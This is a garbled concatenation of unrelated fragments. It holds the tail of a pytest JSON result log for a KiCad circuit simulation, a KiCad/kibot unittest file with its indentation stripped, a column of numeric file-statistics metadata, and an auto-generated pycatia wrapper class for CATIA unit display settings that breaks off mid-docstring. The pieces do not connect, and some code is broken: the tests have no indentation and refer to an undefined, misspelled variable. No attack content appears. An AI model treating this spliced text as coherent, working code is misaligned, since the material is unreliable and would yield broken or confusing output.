'passed'}, {'name': 'test/test_produkt.py::test_trimpot_1_voltage', 'duration': 0.06260482640936971, 'run_index': 6, 'setup': {'name': 'setup', 'duration': 0.0004696645773947239, 'outcome': 'passed'}, 'call': {'name': 'call', 'duration': 0.06136759603396058, 'outcome': 'passed'}, 'teardown': {'name': 'teardown', 'duration': 0.0002979012206196785, 'outcome': 'passed'}, 'outcome': 'passed'}, {'name': 'test/test_produkt.py::test_trimpot_2_voltage', 'duration': 0.06243716413155198, 'run_index': 7, 'setup': {'name': 'setup', 'duration': 0.00034465081989765167, 'outcome': 'passed'}, 'call': {'name': 'call', 'duration': 0.061167610343545675, 'outcome': 'failed', 'longrepr': 'def test_trimpot_2_voltage():\n simulator = load().simulator(temperature=25, nominal_temperature=25)\n analysis_op = simulator.operating_point()\n result = float(analysis_op["Net-_R8-Pad2_"])\n> assert result == approx( -2.9941339771434902e-05, rel=1e-1 )\nE assert -2.1085450543264016e-06 == -2.9941339771434902e-05 ± 3.0e-06\nE + where -2.9941339771434902e-05 ± 3.0e-06 = approx(-2.9941339771434902e-05, rel=0.1)\n\ntest/test_produkt.py:112: AssertionError'}, 'teardown': {'name': 'teardown', 'duration': 0.0005802521482110023, 'outcome': 'passed'}, 'outcome': 'failed'}], 'summary': {'passed': 7, 'failed': 1, 'num_tests': 8, 'duration': 1.4830241203308105}, 'created_at': '2021-11-14 13:49:53.775865'}}}}
import kicad
from kicad import parse_kibot
from kicad import report2xunit
class TestScanner(unittest.TestCase):
def test_scanner(self):
res = ['/github/workspace/example/kontur/main/main.kicad_pcb', '/github/workspace/example/kontur/main/main.sch']
fs = SCons.Node.FS.get_default_fs()
file = fs.File('example/kontur/main/main.pro')
self.assertEqual( kicad.kicad_scan(file, '', ''), res )
def test_scanner_subschema(self):
res = ['/github/workspace/example/vca/main/main.kicad_pcb', '/github/workspace/example/vca/main/main.sch',
'/github/workspace/example/vca/main/VCA1.sch', '/github/workspace/example/vca/main/VCA2.sch',
'/github/workspace/example/vca/main/VCA3.sch', '/github/workspace/example/vca/main/VCA4.sch']
fs = SCons.Node.FS.get_default_fs()
file = fs.File('example/vca/main/main.pro')
self.assertEqual( kicad.kicad_scan(file, '', ''), res )
class TestParseFiles(unittest.TestCase):
def test_schema(self):
self.assertEqual( kicad.get_kicad_files('/foo/bar.pro')[0], '/foo/bar.sch')
def test_pcb(self):
self.assertEqual( kicad.get_kicad_files('/foo/bar.pro')[1], '/foo/bar.kicad_pcb')
def test_name(self):
self.assertEqual( kicad.get_kicad_name('/foo/bar.pro'), 'bar')
class TestParseKibot(unittest.TestCase):
def test_erc_ok(self):
result = {'erc': []}
response = {}
parse_kibot.kibot_parser('test/files/main-erc-ok.txt', response)
self.assertEqual( response, result)
def test_erc_error(self):
result = {'erc': [{'code': '2', 'sheet': '/', 'message': 'Pin not connected (use a "no connection" flag to suppress this error)', 'con': [{'x': '227.33', 'y': '78.74', 'message': 'Pin 5 (Input) of component U5 is unconnected.'}]}, {'code': '2', 'sheet': '/', 'message': 'Pin not connected (use a "no connection" flag to suppress this error)', 'con': [{'x': '214.63', 'y': '123.19', 'message': 'Pin 3 (Input) of component U5 is unconnected.'}]}, {'code': '2', 'sheet': '/', 'message': 'Pin not connected (use a "no connection" flag to suppress this error)', 'con': [{'x': '214.63', 'y': '118.11', 'message': 'Pin 2 (Input) of component U5 is unconnected.'}]}, {'code': '2', 'sheet': '/', 'message': 'Pin not connected (use a "no connection" flag to suppress this error)', 'con': [{'x': '229.87', 'y': '120.65', 'message': 'Pin 1 (Output) of component U5 is unconnected.'}]}, {'code': '2', 'sheet': '/', 'message': 'Pin not connected (use a "no connection" flag to suppress this error)', 'con': [{'x': '233.68', 'y': '100.33', 'message': 'Pin 7 (Output) of component U6 is unconnected.'}]}, {'code': '2', 'sheet': '/', 'message': 'Pin not connected (use a "no connection" flag to suppress this error)', 'con': [{'x': '248.92', 'y': '102.87', 'message': 'Pin 6 (Input) of component U6 is unconnected.'}]}, {'code': '2', 'sheet': '/', 'message': 'Pin not connected (use a "no connection" flag to suppress this error)', 'con': [{'x': '248.92', 'y': '97.79', 'message': 'Pin 5 (Input) of component U6 is unconnected.'}]}, {'code': '2', 'sheet': '/', 'message': 'Pin not connected (use a "no connection" flag to suppress this error)', 'con': [{'x': '242.57', 'y': '76.20', 'message': 'Pin 7 (Output) of component U5 is unconnected.'}]}, {'code': '2', 'sheet': '/', 'message': 'Pin not connected (use a "no connection" flag to suppress this error)', 'con': [{'x': '227.33', 'y': '73.66', 'message': 'Pin 6 (Input) of component U5 is unconnected.'}]}, {'code': '2', 'sheet': '/', 'message': 'Pin not connected (use a "no connection" flag to suppress this error)', 'con': [{'x': '205.74', 'y': '76.20', 'message': 'Pin 7 (Output) of component U4 is unconnected.'}]}, {'code': '2', 'sheet': '/', 'message': 'Pin not connected (use a "no connection" flag to suppress this error)', 'con': [{'x': '190.50', 'y': '73.66', 'message': 'Pin 6 (Input) of component U4 is unconnected.'}]}, {'code': '2', 'sheet': '/', 'message': 'Pin not connected (use a "no connection" flag to suppress this error)', 'con': [{'x': '190.50', 'y': '78.74', 'message': 'Pin 5 (Input) of component U4 is unconnected.'}]}, {'code': '2', 'sheet': '/', 'message': 'Pin not connected (use a "no connection" flag to suppress this error)', 'con': [{'x': '33.02', 'y': '29.21', 'message': 'Pin TN (Passive) of component J2 is unconnected.'}]}, {'code': '2', 'sheet': '/', 'message': 'Pin not connected (use a "no connection" flag to suppress this error)', 'con': [{'x': '33.02', 'y': '24.13', 'message': 'Pin S (Passive) of component J2 is unconnected.'}]}]}
response = {}
parse_kibot.kibot_parser('test/files/main-erc-error.txt', response)
self.assertEqual( response, result)
def test_drc_ok(self):
result = {'drc': [], 'unconnected': []}
response = {}
parse_kibot.kibot_parser('test/files/main-drc-ok.txt', response)
self.assertEqual( response, result)
def test_drc_unconnected(self):
result = {'drc': [], 'unconnected': [{'code': '2', 'sheet': '/', 'message': 'Unconnected items', 'con': [{'x': '61.722', 'y': '94.148', 'message': 'Pad 6 of J1 on All copper layers'}, {'x': '59.182', 'y': '94.148', 'message': 'Pad 5 of J1 on All copper layers'}]}, {'code': '2', 'sheet': '/', 'message': 'Unconnected items', 'con': [{'x': '59.182', 'y': '96.688', 'message': 'Pad 7 of J1 on All copper layers'}, {'x': '59.182', 'y': '94.148', 'message': 'Pad 5 of J1 on All copper layers'}]}, {'code': '2', 'sheet': '/', 'message': 'Unconnected items', 'con': [{'x': '61.722', 'y': '96.688', 'message': 'Pad 8 of J1 on All copper layers'}, {'x': '59.182', 'y': '96.688', 'message': 'Pad 7 of J1 on All copper layers'}]}, {'code': '2', 'sheet': '/', 'message': 'Unconnected items', 'con': [{'x': '61.722', 'y': '96.688', 'message': 'Pad 8 of J1 on All copper layers'}, {'x': '68.732', 'y': '98.518', 'message': 'Pad 1 of C2 on All copper layers'}]}, {'code': '2', 'sheet': '/', 'message': 'Unconnected items', 'con': [{'x': '84.542', 'y': '86.868', 'message': 'Pad 2 of C1 on All copper layers'}, {'x': '68.732', 'y': '98.518', 'message': 'Pad 1 of C2 on All copper layers'}]}, {'code': '2', 'sheet': '/', 'message': 'Unconnected items', 'con': [{'x': '82.042', 'y': '86.868', 'message': 'Pad 1 of C1 on All copper layers'}, {'x': '67.497', 'y': '84.968', 'message': 'Pad 1 of R1 on All copper layers'}]}, {'code': '2', 'sheet': '/', 'message': 'Unconnected items', 'con': [{'x': '71.232', 'y': '98.518', 'message': 'Pad 2 of C2 on All copper layers'}, {'x': '67.497', 'y': '89.018', 'message': 'Pad 1 of R2 on All copper layers'}]}, {'code': '2', 'sheet': '/', 'message': 'Unconnected items', 'con': [{'x': '59.182', 'y': '99.228', 'message': 'Pad 9 of J1 on All copper layers'}, {'x': '61.722', 'y': '99.228', 'message': 'Pad 10 of J1 on All copper layers'}]}, {'code': '2', 'sheet': '/', 'message': 'Unconnected items', 'con': [{'x': '61.722', 'y': '91.608', 'message': 'Pad 4 of J1 on All copper layers'}, {'x': '59.182', 'y': '91.608', 'message': 'Pad 3 of J1 on All copper layers'}]}, {'code': '2', 'sheet': '/', 'message': 'Unconnected items', 'con': [{'x': '77.657', 'y': '84.968', 'message': 'Pad 2 of R1 on All copper layers'}, {'x': '61.722', 'y': '91.608', 'message': 'Pad 4 of J1 on All copper layers'}]}, {'code': '2', 'sheet': '/', 'message': 'Unconnected items', 'con': [{'x': '61.722', 'y': '89.068', 'message': 'Pad 2 of J1 on All copper layers'}, {'x': '59.182', 'y': '89.068', 'message': 'Pad 1 of J1 on All copper layers'}]}, {'code': '2', 'sheet': '/', 'message': 'Unconnected items', 'con': [{'x': '77.657', 'y': '89.018', 'message': 'Pad 2 of R2 on All copper layers'}, {'x': '61.722', 'y': '89.068', 'message': 'Pad 2 of J1 on All copper layers'}]}]}
response = {}
parse_kibot.kibot_parser('test/files/main-drc-unconnected.txt', response)
self.assertEqual( response, result)
class TestCombineResults(unittest.TestCase):
def test_combined_reports(self):
self.assertEqual( parse_kibot.combine_reports(['test/files/kontur_main_bom.json', 'test/files/kontur_main_report.json']), comnbined_result)
class TestCombineResultsWithTests(unittest.TestCase):
def test_combined_reports(self):
self.assertEqual( parse_kibot.combine_reports(['test/files/kontur_main_bom.json', 'test/files/kontur_main_report.json', 'test/files/produkt_test.json']), comnbined_result_test)
class TestReportXunit(unittest.TestCase):
def test_xunit_reports(self):
report2xunit.convert('test/files/report.json', 'test/files/report.xml')
tree = ET.parse('test/files/report.xml')
root = tree.getroot()
self.assertTrue( Path('test/files/report.xml').exists )
| 212.396396
| 8,726
| 0.651468
| 3,376
| 23,576
| 4.42654
| 0.165581
| 0.008431
| 0.017398
| 0.029577
| 0.789615
| 0.757562
| 0.7322
| 0.682883
| 0.671373
| 0.641194
| 0
| 0.109963
| 0.117068
| 23,576
| 110
| 8,727
| 214.327273
| 0.60785
| 0.044155
| 0
| 0.212121
| 0
| 0.409091
| 0.631651
| 0.184952
| 0
| 0
| 0
| 0
| 0.19697
| 1
| 0.181818
| false
| 0.030303
| 0.151515
| 0
| 0.424242
| 0.030303
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cabc05d6df53c428b514fd2e408fe75773bd3d3c
| 32,532
|
py
|
Python
|
pycatia/knowledge_interfaces/units_sheet_setting_att.py
|
evereux/catia_python
|
08948585899b12587b0415ce3c9191a408b34897
|
[
"MIT"
] | 90
|
2019-02-21T10:05:28.000Z
|
2022-03-19T01:53:41.000Z
|
pycatia/knowledge_interfaces/units_sheet_setting_att.py
|
Luanee/pycatia
|
ea5eef8178f73de12404561c00baf7a7ca30da59
|
[
"MIT"
] | 99
|
2019-05-21T08:29:12.000Z
|
2022-03-25T09:55:15.000Z
|
pycatia/knowledge_interfaces/units_sheet_setting_att.py
|
Luanee/pycatia
|
ea5eef8178f73de12404561c00baf7a7ca30da59
|
[
"MIT"
] | 26
|
2019-04-04T06:31:36.000Z
|
2022-03-30T07:24:47.000Z
|
#! usr/bin/python3.6
"""
Module initially auto generated using V5Automation files from CATIA V5 R28 on 2020-06-11 12:40:47.360445
.. warning::
The notes denoted "CAA V5 Visual Basic Help" are to be used as reference only.
They are there as a guide as to how the visual basic / catscript functions work
and thus help debugging in pycatia.
"""
from pycatia.system_interfaces.setting_controller import SettingController
class UnitsSheetSettingAtt(SettingController):
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445)
| System.IUnknown
| System.IDispatch
| System.CATBaseUnknown
| System.CATBaseDispatch
| System.AnyObject
| System.SettingController
| UnitsSheetSettingAtt
|
| The interface to access a CATIAUnitsSheetSettingAtt.
| This interface may be used to read or modify in the CATIA/Tools/Option the
| settings values of Units sheet.
"""
def __init__(self, com_object):
super().__init__(com_object)
self.units_sheet_setting_att = com_object
@property
def display_trailing_zeros(self) -> int:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445)
| o Property DisplayTrailingZeros() As short
|
| Returns or sets the DisplayTrailingZeros parameter.
| Role:Return or Set the DisplayTrailingZeros parameter if it is possible in
| the current administrative context. In user mode this method will always return
| E_FAIL.
|
| Parameters:
|
| oDisplayTrailingZeros
| Legal values:
| 0 : to not display trailing zeros
| 1 : to display trailing zeros.
:return: int
:rtype: int
"""
return self.units_sheet_setting_att.DisplayTrailingZeros
@display_trailing_zeros.setter
def display_trailing_zeros(self, value: int):
"""
:param int value:
"""
self.units_sheet_setting_att.DisplayTrailingZeros = value
@property
def exp_notation_values_greater(self) -> float:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445)
| o Property ExpNotationValuesGreater() As double
|
| Returns or sets the ExpNotationValuesGreater parameter.
| Role:Return or Set the ExpNotationValuesGreater parameter if it is possible
| in the current administrative context. In user mode this method will always
| return E_FAIL.
|
| Parameters:
|
| oExpNotationValuesGreater
| The minimum value for exponential notation values.
:return: float
:rtype: float
"""
return self.units_sheet_setting_att.ExpNotationValuesGreater
@exp_notation_values_greater.setter
def exp_notation_values_greater(self, value: float):
"""
:param float value:
"""
self.units_sheet_setting_att.ExpNotationValuesGreater = value
@property
def exp_notation_values_lower(self) -> float:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445)
| o Property ExpNotationValuesLower() As double
|
| Returns or sets the ExpNotationValuesLower parameter.
| Role:Return or Set the ExpNotationValuesGreater parameter if it is possible
| in the current administrative context. In user mode this method will always
| return E_FAIL.
|
| Parameters:
|
| oExpNotationValuesLower
| The maximum value for exponential notation values.
:return: float
:rtype: float
"""
return self.units_sheet_setting_att.ExpNotationValuesLower
@exp_notation_values_lower.setter
def exp_notation_values_lower(self, value: float):
"""
:param float value:
"""
self.units_sheet_setting_att.ExpNotationValuesLower = value
@property
def list_of_magnitudes(self) -> tuple:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445)
| o Property ListOfMagnitudes() As CATSafeArrayVariant (Read
| Only)
|
| Returns or sets the ListOfMagnitudes parameter.
|
| Ensure consistency with the C++ interface to which the work is delegated.
:return: tuple
:rtype: tuple
"""
return self.units_sheet_setting_att.ListOfMagnitudes
@property
def list_of_magnitudes_size(self) -> float:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445)
| o Property ListOfMagnitudesSize() As double (Read Only)
|
| Returns or sets the ListOfMagnitudesSize parameter.
|
| Ensure consistency with the C++ interface to which the work is delegated.
:return: float
:rtype: float
"""
return self.units_sheet_setting_att.ListOfMagnitudesSize
@property
def same_display(self) -> int:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445)
| o Property SameDisplay() As short
|
| Returns or sets the SameDisplay parameter.
| Role:Return or Set the SameDisplay parameter if it is possible in the
| current administrative context. In user mode this method will always return
| E_FAIL.
|
| Parameters:
|
| oSameDisplay
| Legal values:
| 0 : to not display same display
| 1 : to display same display.
:return: int
:rtype: int
"""
return self.units_sheet_setting_att.SameDisplay
@same_display.setter
def same_display(self, value: int):
"""
:param int value:
"""
self.units_sheet_setting_att.SameDisplay = value
def commit_for_units(self) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445))
| o Sub CommitForUnits()
|
| Implements a function from an interface.
|
| See also:
| UnitsSheetSettingAtt.CommitForUnits
:return: None
:rtype: None
"""
return self.units_sheet_setting_att.CommitForUnits()
def get_decimal_read_only(self, i_magnitude_name: str, o_decimal_place_read_only: float) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445))
| o Sub GetDecimalReadOnly(CATBSTR iMagnitudeName,
| double oDecimalPlaceReadOnly)
|
| Returns the number of decimals for ReadOnly number.
:param str i_magnitude_name:
:param float o_decimal_place_read_only:
:return: None
:rtype: None
"""
return self.units_sheet_setting_att.GetDecimalReadOnly(i_magnitude_name, o_decimal_place_read_only)
def get_decimal_read_write(self, i_magnitude_name: str, o_decimal_place_read_write: float) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445))
| o Sub GetDecimalReadWrite(CATBSTR iMagnitudeName,
| double oDecimalPlaceReadWrite)
|
| Returns the number of decimals for ReadWrite number.
:param str i_magnitude_name:
:param float o_decimal_place_read_write:
:return: None
:rtype: None
"""
return self.units_sheet_setting_att.GetDecimalReadWrite(i_magnitude_name, o_decimal_place_read_write)
def get_dimensions_display_info(self, io_admin_level: str, io_locked: str) -> bool:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445))
| o Func GetDimensionsDisplayInfo(CATBSTR ioAdminLevel,
| CATBSTR ioLocked) As boolean
|
| Retrieves information about the DimensionsDisplay setting
| parameter.
| Refer to SettingController for a detailed description.
:param str io_admin_level:
:param str io_locked:
:return: bool
:rtype: bool
"""
return self.units_sheet_setting_att.GetDimensionsDisplayInfo(io_admin_level, io_locked)
def get_display_trailing_zeros_info(self, io_admin_level: str, io_locked: str) -> bool:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445))
| o Func GetDisplayTrailingZerosInfo(CATBSTR ioAdminLevel,
| CATBSTR ioLocked) As boolean
|
| Retrieves environment informations for the DisplayTrailingZeros
| parameter.
| Role:Retrieves the state of the DisplayTrailingZeros parameter in the
| current environment.
|
| Parameters:
|
| ioAdminLevel
|
| If the parameter is locked, AdminLevel gives the administration
| level that imposes the value of the parameter.
| If the parameter is not locked, AdminLevel gives the administration
| level that will give the value of the parameter after a reset.
|
| ioLocked
| Indicates if the parameter has been locked.
|
| Returns:
| Indicates if the parameter has been explicitly modified or remain to
| the administrated value.
:param str io_admin_level:
:param str io_locked:
:return: bool
:rtype: bool
"""
return self.units_sheet_setting_att.GetDisplayTrailingZerosInfo(io_admin_level, io_locked)
def get_exp_notation_values_greater_info(self, io_admin_level: str, io_locked: str) -> bool:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445))
| o Func GetExpNotationValuesGreaterInfo(CATBSTR ioAdminLevel,
| CATBSTR ioLocked) As boolean
|
| Retrieves environment informations for the ExpNotationValuesGreater
| parameter.
| Role:Retrieves the state of the ExpNotationValuesGreater parameter in the
| current environment.
|
| Parameters:
|
| ioAdminLevel
|
| If the parameter is locked, AdminLevel gives the administration
| level that imposes the value of the parameter.
| If the parameter is not locked, AdminLevel gives the administration
| level that will give the value of the parameter after a reset.
|
| ioLocked
| Indicates if the parameter has been locked.
|
| Returns:
| Indicates if the parameter has been explicitly modified or remain to
| the administrated value.
:param str io_admin_level:
:param str io_locked:
:return: bool
:rtype: bool
"""
return self.units_sheet_setting_att.GetExpNotationValuesGreaterInfo(io_admin_level, io_locked)
def get_exp_notation_values_lower_info(self, io_admin_level: str, io_locked: str) -> bool:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445))
| o Func GetExpNotationValuesLowerInfo(CATBSTR ioAdminLevel,
| CATBSTR ioLocked) As boolean
|
| Retrieves environment informations for the ExpNotationValuesLower
| parameter.
| Role:Retrieves the state of the ExpNotationValuesLower parameter in the
| current environment.
|
| Parameters:
|
| ioAdminLevel
|
| If the parameter is locked, AdminLevel gives the administration
| level that imposes the value of the parameter.
| If the parameter is not locked, AdminLevel gives the administration
| level that will give the value of the parameter after a reset.
|
| ioLocked
| Indicates if the parameter has been locked.
|
| Returns:
| Indicates if the parameter has been explicitly modified or remain to
| the administrated value.
:param str io_admin_level:
:param str io_locked:
:return: bool
:rtype: bool
"""
return self.units_sheet_setting_att.GetExpNotationValuesLowerInfo(io_admin_level, io_locked)
def get_list_of_magnitudes_info(self, io_admin_level: str, io_locked: str) -> bool:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445))
| o Func GetListOfMagnitudesInfo(CATBSTR ioAdminLevel,
| CATBSTR ioLocked) As boolean
|
| Retrieves information about the ListOfMagnitudes setting
| parameter.
| Refer to SettingController for a detailed description.
:param str io_admin_level:
:param str io_locked:
:return: bool
:rtype: bool
"""
return self.units_sheet_setting_att.GetListOfMagnitudesInfo(io_admin_level, io_locked)
def get_magnitude_values(self,
i_magnitude_name: str,
o_unit_name: str,
o_decimal_place_read_write: float,
o_decimal_place_read_only: float) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445))
| o Sub GetMagnitudeValues(CATBSTR iMagnitudeName,
| CATBSTR oUnitName,
| double oDecimalPlaceReadWrite,
| double oDecimalPlaceReadOnly)
|
| Returns the Magnitude parameters.
|
| Ensure consistency with the C++ interface to which the work is delegated.
:param str i_magnitude_name:
:param str o_unit_name:
:param float o_decimal_place_read_write:
:param float o_decimal_place_read_only:
:return: None
:rtype: None
"""
return self.units_sheet_setting_att.GetMagnitudeValues(i_magnitude_name, o_unit_name,
o_decimal_place_read_write, o_decimal_place_read_only)
def get_same_display_info(self, io_admin_level: str, io_locked: str) -> bool:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445))
| o Func GetSameDisplayInfo(CATBSTR ioAdminLevel,
| CATBSTR ioLocked) As boolean
|
| Retrieves environment informations for the SameDisplay
| parameter.
| Role:Retrieves the state of the SameDisplay parameter in the current
| environment.
|
| Parameters:
|
| ioAdminLevel
|
| If the parameter is locked, AdminLevel gives the administration
| level that imposes the value of the parameter.
| If the parameter is not locked, AdminLevel gives the administration
| level that will give the value of the parameter after a reset.
|
| ioLocked
| Indicates if the parameter has been locked.
|
| Returns:
| Indicates if the parameter has been explicitly modified or remain to
| the administrated value.
:param str io_admin_level:
:param str io_locked:
:return: bool
:rtype: bool
"""
return self.units_sheet_setting_att.GetSameDisplayInfo(io_admin_level, io_locked)
def reset_to_admin_values_for_units(self) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445))
| o Sub ResetToAdminValuesForUnits()
|
| Implements a function from an interface.
|
| See also:
| UnitsSheetSettingAtt.ResetToAdminValuesForUnits
:return: None
:rtype: None
"""
return self.units_sheet_setting_att.ResetToAdminValuesForUnits()
def rollback_for_units(self) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445))
| o Sub RollbackForUnits()
|
| Implements a function from an interface.
|
| See also:
| UnitsSheetSettingAtt.RollbackForUnits
:return: None
:rtype: None
"""
return self.units_sheet_setting_att.RollbackForUnits()
def save_repository_for_units(self) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445))
| o Sub SaveRepositoryForUnits()
|
| Implements a function from an interface.
|
| See also:
| UnitsSheetSettingAtt.SaveRepositoryForUnits
:return: None
:rtype: None
"""
return self.units_sheet_setting_att.SaveRepositoryForUnits()
def set_dimensions_display_lock(self, i_locked: bool) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445))
| o Sub SetDimensionsDisplayLock(boolean iLocked)
|
| Locks or unlocks the DimensionsDisplay setting parameter.
| Refer to SettingController for a detailed description.
:param bool i_locked:
:return: None
:rtype: None
"""
return self.units_sheet_setting_att.SetDimensionsDisplayLock(i_locked)
# # # # Autogenerated comment:
# # some methods require a system service call as the methods expects a vb array object
# # passed to it and there is no way to do this directly with python. In those cases the following code
# # should be uncommented and edited accordingly. Otherwise completely remove all this.
# # vba_function_name = 'set_dimensions_display_lock'
# # vba_code = """
# # Public Function set_dimensions_display_lock(units_sheet_setting_att)
# # Dim iLocked (2)
# # units_sheet_setting_att.SetDimensionsDisplayLock iLocked
# # set_dimensions_display_lock = iLocked
# # End Function
# # """
# # system_service = self.application.system_service
# # return system_service.evaluate(vba_code, 0, vba_function_name, [self.com_object])
def set_display_trailing_zeros_lock(self, i_locked: bool) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445))
| o Sub SetDisplayTrailingZerosLock(boolean iLocked)
|
| Deprecated:
| V5R15. Use SetDimensionsDisplayLock. Locks or unlocks the
| DisplayTrailingZeros parameter.
| Role:Locks or unlocks the DisplayTrailingZeros parameter if it is
| possible in the current administrative context. In user mode this method will
| always return E_FAIL.
| Parameters:
|
| iLocked
| the locking operation to be performed Legal
| values:
| TRUE : to lock the parameter.
| FALSE: to unlock the parameter.
:param bool i_locked:
:return: None
:rtype: None
"""
return self.units_sheet_setting_att.SetDisplayTrailingZerosLock(i_locked)
# # # # Autogenerated comment:
# # some methods require a system service call as the methods expects a vb array object
# # passed to it and there is no way to do this directly with python. In those cases the following code
# # should be uncommented and edited accordingly. Otherwise completely remove all this.
# # vba_function_name = 'set_display_trailing_zeros_lock'
# # vba_code = """
# # Public Function set_display_trailing_zeros_lock(units_sheet_setting_att)
# # Dim iLocked (2)
# # units_sheet_setting_att.SetDisplayTrailingZerosLock iLocked
# # set_display_trailing_zeros_lock = iLocked
# # End Function
# # """
# # system_service = self.application.system_service
# # return system_service.evaluate(vba_code, 0, vba_function_name, [self.com_object])
def set_exp_notation_values_greater_lock(self, i_locked: bool) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445))
| o Sub SetExpNotationValuesGreaterLock(boolean iLocked)
|
| Deprecated:
| V5R15. Use SetSameDisplayLock. Locks or unlocks the
| ExpNotationValuesGreater parameter.
| Role:Locks or unlocks the ExpNotationValuesGreater parameter if it is
| possible in the current administrative context. In user mode this method will
| always return E_FAIL.
| Parameters:
|
| iLocked
| the locking operation to be performed Legal
| values:
| TRUE : to lock the parameter.
| FALSE: to unlock the parameter.
:param bool i_locked:
:return: None
:rtype: None
"""
return self.units_sheet_setting_att.SetExpNotationValuesGreaterLock(i_locked)
# # # # Autogenerated comment:
# # some methods require a system service call as the methods expects a vb array object
# # passed to it and there is no way to do this directly with python. In those cases the following code
# # should be uncommented and edited accordingly. Otherwise completely remove all this.
# # vba_function_name = 'set_exp_notation_values_greater_lock'
# # vba_code = """
# # Public Function set_exp_notation_values_greater_lock(units_sheet_setting_att)
# # Dim iLocked (2)
# # units_sheet_setting_att.SetExpNotationValuesGreaterLock iLocked
# # set_exp_notation_values_greater_lock = iLocked
# # End Function
# # """
# # system_service = self.application.system_service
# # return system_service.evaluate(vba_code, 0, vba_function_name, [self.com_object])
def set_exp_notation_values_lower_lock(self, i_locked: bool) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445))
| o Sub SetExpNotationValuesLowerLock(boolean iLocked)
|
| Deprecated:
| V5R15. Use SetDimensionsDisplayLock. Locks or unlocks the
| ExpNotationValuesLower parameter.
| Role:Locks or unlocks the ExpNotationValuesLower parameter if it is
| possible in the current administrative context. In user mode this method will
| always return E_FAIL.
| Parameters:
|
| iLocked
| the locking operation to be performed Legal
| values:
| TRUE : to lock the parameter.
| FALSE: to unlock the parameter.
:param bool i_locked:
:return: None
:rtype: None
"""
return self.units_sheet_setting_att.SetExpNotationValuesLowerLock(i_locked)
# # # # Autogenerated comment:
# # some methods require a system service call as the methods expects a vb array object
# # passed to it and there is no way to do this directly with python. In those cases the following code
# # should be uncommented and edited accordingly. Otherwise completely remove all this.
# # vba_function_name = 'set_exp_notation_values_lower_lock'
# # vba_code = """
# # Public Function set_exp_notation_values_lower_lock(units_sheet_setting_att)
# # Dim iLocked (2)
# # units_sheet_setting_att.SetExpNotationValuesLowerLock iLocked
# # set_exp_notation_values_lower_lock = iLocked
# # End Function
# # """
# # system_service = self.application.system_service
# # return system_service.evaluate(vba_code, 0, vba_function_name, [self.com_object])
def set_list_of_magnitudes_lock(self, i_locked: bool) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445))
| o Sub SetListOfMagnitudesLock(boolean iLocked)
|
| Locks or unlocks the ListOfMagnitudes setting parameter.
| Refer to SettingController for a detailed description.
:param bool i_locked:
:return: None
:rtype: None
"""
return self.units_sheet_setting_att.SetListOfMagnitudesLock(i_locked)
# # # # Autogenerated comment:
# # some methods require a system service call as the methods expects a vb array object
# # passed to it and there is no way to do this directly with python. In those cases the following code
# # should be uncommented and edited accordingly. Otherwise completely remove all this.
# # vba_function_name = 'set_list_of_magnitudes_lock'
# # vba_code = """
# # Public Function set_list_of_magnitudes_lock(units_sheet_setting_att)
# # Dim iLocked (2)
# # units_sheet_setting_att.SetListOfMagnitudesLock iLocked
# # set_list_of_magnitudes_lock = iLocked
# # End Function
# # """
# # system_service = self.application.system_service
# # return system_service.evaluate(vba_code, 0, vba_function_name, [self.com_object])
def set_magnitude_values(self,
i_magnitude_name: str,
i_unit_name: str,
i_decimal_place_read_write: float,
i_decimal_place_read_only: float) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445))
| o Sub SetMagnitudeValues(CATBSTR iMagnitudeName,
| CATBSTR iUnitName,
| double iDecimalPlaceReadWrite,
| double iDecimalPlaceReadOnly)
|
| Sets the Magnitude parameters.
|
| Ensure consistency with the C++ interface to which the work is delegated.
:param str i_magnitude_name:
:param str i_unit_name:
:param float i_decimal_place_read_write:
:param float i_decimal_place_read_only:
:return: None
:rtype: None
"""
return self.units_sheet_setting_att.SetMagnitudeValues(i_magnitude_name, i_unit_name,
i_decimal_place_read_write, i_decimal_place_read_only)
def set_same_display_lock(self, i_locked: bool) -> None:
"""
.. note::
:class: toggle
